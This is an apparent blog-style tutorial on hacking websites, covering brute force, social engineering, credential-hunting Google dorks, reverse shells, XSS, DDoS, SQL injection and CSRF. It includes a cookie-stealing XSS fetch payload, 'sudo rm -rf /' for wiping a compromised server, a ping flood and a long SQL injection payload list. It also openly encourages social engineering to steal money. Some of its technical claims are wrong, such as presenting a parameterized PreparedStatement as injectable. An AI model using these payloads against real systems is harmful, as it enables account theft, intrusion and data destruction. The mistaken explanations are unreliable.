All the Methods You Can Use to Hack into a Website

In this article, we are looking into various basic methods of hacking into a user's web account and the website's database itself by using some basic methods.

Points to Cover

Hacking user accounts.
Finding database leaks.
Reverse shell connections.
XSS cross-site scripting.
DDOS attacks.
SQL injection.
Some basic target enumeration.
Cross-site request forgery.
Bug Bounty.
Websites for bug bounties.

Hacking User Accounts

User's accounts in a website are usually social media websites for example Instagram, Twitter, Facebook, Reddit, etc.

These accounts contain user information such as his password, IP address, emails, location, personal photos, etc.

During data breaches the information is leaked to the hackers which can be accessed via API's which are paid obviously but such information is traded in the Dark-web for bitcoins and if you are not a real member of a hacker group who does all such stuff well you might be a good guy other than this hackers use some other methods to hack into a user's accounts.

Some of them are:

Brute-force.
Social Engineering.

Brute-forcing:

Technique in which the hacker uses a ton of custom or pre-recorded passwords to forcefully gain access into a victim's account.

In short, it is guessing the password on a trial and error basis.

They have a lot of methods and programs to execute this some of them are Burpsuite and my personal favorite Hatch.

Burpsuite works by capturing the login request and analyzing the login credentials and using the updated packet and redesigning it according to the new password and Bruteforcing the website In this way.

Hatch is a really simple tool made in Python that uses selenium to create a portable website and Bruteforcing the website by providing the username-selector, password-selector, login-selector, and the username and password file accordingly.

This is a simple but slow and better way for hacking into individual social media accounts, but in the long run, Burpsuite is the best for the job as it can do more than a simple brute-force attack.

Social Engineering:

Social Engineering is a simple yet complicated thing, simply because it is easy to understand and complicated because it is difficult to execute.

In Social Engineering you need to convince the target that you are a legit person and try to retrieve information out of him but it is not everyone's cup of tea it takes a lot of practice and a strongly convincing nature for it to be done without any problem.

If you are in India you might have received a call from a person known as Priya regarding a credit-card-related issue this is a really common thing in Social engineering just convince them and take their sensitive info and steal their money or their privacy.

You can use this method to insert a payload or a RAT into a victim's computer to make it vulnerable to hackers.

Finding Database Leaks

Finding Database leaks is relatively easy for some users who use the Dark-web as it can be found in any dark web address but for some people who do not know about the dark web it is a place where all the black hat hackers sell the hacked data in exchange for bitcoins.

Commonly there are some unexpected leaks left by the websites due to some miss configs. This is something I would like to find out about during a bug bounty program.

We can find these leaks using something known as google dorks.

Using google dorks you can find any hidden and potential files with sensitive information for example files like Logs, Username.txt, Password.txt, Database folders, etc.

This is really useful during a bug bounty program or during a pentesting where you might have to find the misconfigured database.

Its really interesting right so to execute this you will need:

A google browser.
A lot of time.
A lot of searching.

Most of the requirements are not software-related.

Exploit:

First, go to the exploit DB website and navigate to the google dorks section you can find thousands of previously worked dorks submitted by the hackers for later use.

Copy the exploit which has the most useful to you and paste that payload on the search bar and you are ready to go 😁😁.

For example, if I want to find miss configured password and username files I use his command.

# DORK: allintext:"*[email protected]" OR "password" OR "username" filetype:xlsx

In the above dork, we are specifically telling google to search for the words password, username, and [email protected] for more accuracy. And the file type we intend to find in his case is the .xlsx file type or excel sheet which is usually used to store database data.

The exploit payload copied direcly from exploit-db website
.

The other way of finding leaked passwords and username is finding it in huge data breaches which you can find and buy it on the dark web.

To check if your password is not in a data breach check it in haveibeenpwned.com which is the largest pwned database out there.

Reverse shell connection

A reverse connection to the server's shell or terminal is a really common thing to use in web pentesting.

Hackers find the programming language used in the making of the website and use the payload accordingly.

When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell with or without root access for further malicious activities such as a huge data breach, complete erase of the server, etc.

Prerequisites:

To listen to a reverse shell in Linux you need to have netcat installed but in windows, you need to have ncat which comes installed with nmap suite to run listening on Linux, and windows you need to execute the following code to listen for the reverse shell.

linux
nc –nlvp <port-used-by-u>

windows
ncat.exe –nlvp <port-used-by-u>

The most commonly used programming language used is Python, PHP, java, nodejs, bash, etc. It is a really easy thing to learn you can execute it from a code execution vulnerability.

For example: if there is a code injected into an image with a PHP code for a Unix reverse connection with bash root access and if we could somehow execute it from the database we can obtain a reverse connection.

We can locate the POST DESTINATION using BURPSUITE or OWASP ZAP which intercepts the GET and POST URL.

If you want a good-looking shell and you found a bug that allows you to send a .php code or a .php file and if you intercept the POST location you can use powny shell payload which gives a really pretty web shell.

Powny shell github repo

There are many more things to explain but that's for another article. Stay tuned for more.

XSS cross-site scripting

The concept of cross-site scripting is completely the opposite of reverse shell connection its a really difficult task you need to do a lot of enumeration on the client-side than on a server end for example:

I am a hacker enumerating on the client-side let us take hackernoon as my target website so first I will look into the source code and the programming language used to let us consider it as node js now I need an appropriate location to inject the code the best location for this is the search bar.

Now I need to check the source code for a basic or advanced script in node js for the exploit.

You have a hacker must look for a code like this:

app.get('/', function (req, res) {
  if (req.query.newReview) reviews.push(req.query.newReview);
  const formattedReviews = reviews.map((review)=> `<dt>User</dt><dd>${review}</dd>`).join(' ');
  const template = fs.readFileSync('./templates/index.html', 'utf8');
  const view = template.replace('$reviews$', formattedReviews);
  res.send(view);
});

In this code, we can see that the input reviews are directly executed as a code and it will be executed without any issue.

Note this is an example I have no proof of this vulnerability in hackernoon, coming back on the topic.

In such a case we can execute this code to retrieve this information.

<script>fetch(`http://localhost:4000?data=${document.cookie}`)</script>

In this code, we can retire the document and all from this website.

Like this, we can be smart and start a reverse shell session which can actually cause a huge data breach.

Serious issues:

Such a vulnerability has the potential to launch a reverse shell attack making it even more powerful and deadly.

For example, if I am a hacker who wants to destroy the website after I gain the root shell I will execute this simple command.

Sudo rm -rf /

This command removes all the files and programs permanently from the computer.

DDOS attacks

DDoS attack or Distributed Denial of Service attack is an attack aiming to destroy the service of a website by crashing its server by sending a lot of packets and requests to the server. The hackers usually use tools like the low orbit ion cannon, ping of death, SYN flood, HTTP flood & more.

To conduct such a attack hackers require some really powerful computers with a really good internet connection around 220 Mbps or 300 Mbps of speed is minimum or you can have a lot of low or medium-performing computers with considerable internet speed.

There are a lot of DDoS attacks out there but we are concentrating on some of the attacks and I will be telling you about the easiest way to set up a botnet.

Types of DDOS attacks:

There are a lot of DDoS attacks out there we are going to discuss:-

ICMP attack.
SYN flood attack.
HTTP flood attack.
Slowloris.
IP null attacks.

ICMP attack:-

ICMP attack is an attack in which the attacker sends pings or Internet Control Messaging Protocol to send multiple requests to the server which completely drains the resources of the server causing it to restart or crash such a ping attack can be done on a windows system using the ping command.

Usually, people use the ping command to check the signal strength. But hackers do things differently I meanly really for example:-

Normal people:

C:\WINDOWS\system32>ping www.google.com

Pinging www.google.com [142.250.182.4] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 142.250.182.4:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

What hackers do:

C:\WINDOWS\system32>Ping www.google.com -l 65500

Pinging www.google.com [142.250.182.4] with 65500 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 142.250.182.4:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

You see the packet size over there is the max you can send the number is 65500 that's huge, think that you have 50 computer sending 1000 packets of that size its huge for any system to handle it will obviously crash the system.

SYN flood attack:-

An SYN flood attack is an attack that utilizes the age-old TCP communication known as the three-way handshake which is:-

In the above image, we can see that first, the client sends the SYN request to start a conversation, the server replies with an SYN/ACK to continue the conversation and the conversation is closed with the ACK.

This is the usual cause of a regular TCP conversation between a server and a client, but what hackers do is that they just send the SYN request and leave the conversation making the conversation incomplete and this takes a lot of the system resources for the server to understand what is happening with it and in a scenario where a hacker is sending thousands of such requests from let's say 50 computers.

That is serious trouble for the server that will kill the service for the legitimate clients also.

HTTP flood attack:-

HTTP flood as the name suggests this attack is an application layer denial of service attack it sending a lot of packets to the server with the HTTP header which is completely legit packets with GET
or POST
request making it extremely resource exhausting for the server.

In this case, the attacker usually prefers a Linux system in which he can access the shell and can install the necessary programs he wants such as Python.

In these attacks, the server can find out all the necessary requests and fulfill them in time, and cant allocate the resources to other requests also eventually crashing it.

HTTP GET-DDoS attack: In this attack, the attacker is sending a huge number of GET
requests like the user information downloading a lot of files from the website, when well synchronized this will make the server busy with the hacker and stop the actual user from getting any service.

HTTP POST-DDoS attack: In this attack, the attacker is sending a huge number of post requests like the user information, submitting a huge amount of forms to the website, when well synchronized this will make the server busy with the hacker and stop the actual user from getting any service. This is very similar to the GET-DDoS attack
.

Slowloris:-

Slowloris is one of the slowest but highly lethal attacks amongst the DDoS attacks out there generates a very low amount of packets that help it to escape the standard DDoS prevention tools. In the above HTTP flood attack, we see that there is a high flood of

GET

or POST
requests which are terminated as per the three-way handshake or the SYN-ACK sequence the sequence with the communication ending with the ACK from the server closing the call but in case of the Slowloris, the ACK itself is terminated this makes the server wait for the call to end but it won't end.

The server reduces the high requests by canceling them by the termination process but now as the communication is incomplete the server waits for the call to end and starts to allocate its resources to it but Slowloris sends thousands of such packets over several minutes. Just like a slow poison slowly killing it similarly Slowloris crashes the server.

IP null attack:-

According to the RFC rules, the IP packet header should contain information on its transport-level protocol in the Protocol field. In case of an IP Null attack, the malefactors send packets containing the null values in this field. More often than, the edge routers and firewalls will let such a packet in as an unclassified one. Though nowadays the null value in the Protocol field is reserved for IPv6 Hop-by-Hop Option (HOPOPT), not every server can receive and correctly process such a packet. And if such packets come in large quantities, their analysis will consume a large percentage of system resources, or exhaust them entirely and cause a server failure.

Copied directly from my previous article

Various methods to launch a DDOS attack.

Recommend reading it.

SQL Injection

An SQL injection vulnerability is an issue where the webserver is made to respond in such a way that the website gives all the users information if the conditions are satisfied.

For example, let us consider a SQL code:

String firstname = req.getParameter("firstname");
String lastname = req.getParameter("lastname");
String query = "SELECT id, firstname, lastname FROM authors WHERE firstname = ? and lastname = ?";
// Using a PreparedStatement to take the user’s query and sanitize it 
// by setting it as a string, instead of directly passing it to DB
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, firstname );
pstmt.setString( 2, lastname );
try
{
    ResultSet results = pstmt.execute( );
}

In the code, if we enter the parameter (‘name’ OR ‘a’=’a’) or ('a'='a')
we can see that this value is a true value so it won't get the user instead it returns all the user's info or one user's info at a time.

This is not so easy to find as it will be under complete filtering and constant testing so it is not easy to find.

You can start brute-forcing the username slot and sniper it using BURPSUITE or ZAP.

The best payload file for this task is the payloadbox sql injection scripts
GITHUB LINK
.

You can use this to hack and get the best result from it and this will help a lot in a bug bounty scenario.

Some examples of a SQL injection payload is:


''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/ 
+        addition, concatenate (or space in url)
||        (double pipe) concatenate
%        wildcard attribute indicator
@variable    local variable
@@variable    global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1    
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1-- 
 OR 1=0-- 
 OR x=x-- 
 OR x=y-- 
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14# 
 ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23#

SQL payloads copied directly from medium post

link to the post

Some Basic Target Enumeration

The target enumeration includes:

Fuzzing directories.
Find the possible previous vulnerability reports using google dorks.
Use BURP & ZAP.

Fuzzing directories:

This includes using wfuzz and the seclist to brute-force directories for the possible miss configured vulnerable directories with huge data collections of real users.

Link to a detailed video regarding this on youtube by

hackersploit

Finding previous vulnerability reports:

Using the code we can find potential reports.

intext:reports filetype:cache

By adding a specific URL you can find potential vulnerability reports.

Use BURP and ZAP:

SQL map, Nikto, Burpsuite, and Zap are the most popular products and are the standard in this field.

Burp, zap, Nikto, and any other tool are mainly for recon purposes it intends to help you find the best way to hack into the website.

You can find the tutorial for both this on youtube and their respective websites.

Cross-Site Request Forgery

Cross-site request forgeries are a vulnerability that can be exploited on the client-side where the GET request of a particular variable is modified to achieve malicious goals.

For example, I am a hacker who wants to change the password of an existing user so for that I need to get the GET request and the parameters for it and after some careful analysis with the help of BURPSUITE, we can enumerate and forge a packet of malicious intent.

After achieving that we can obtain the XSS vulnerability or any such vulnerability and code a URL with the password change request in the URL and when the target who has already logged in when executed changes the target's password without is a notice giving the hacker full access to the victim's account.

Bug Bounties

A bug bounty is a hacking program where the hackers are paid for finding a bug or vulnerability in a website or app the reward depends on the level of the bug low, medium, and high, and the bug report will be validated and based on its level, the reward will be given.

Websites For Bug Bounty Program

The best place to get the bug bounty program that is valid are:

Hackerone.
HTB (Hack The Box).

These websites host bug bounty throughout the year just select one and start finding bugs to win money.

The rewards range from $ 100 to $ 5000 based on the level of the bug and the website you have targeted.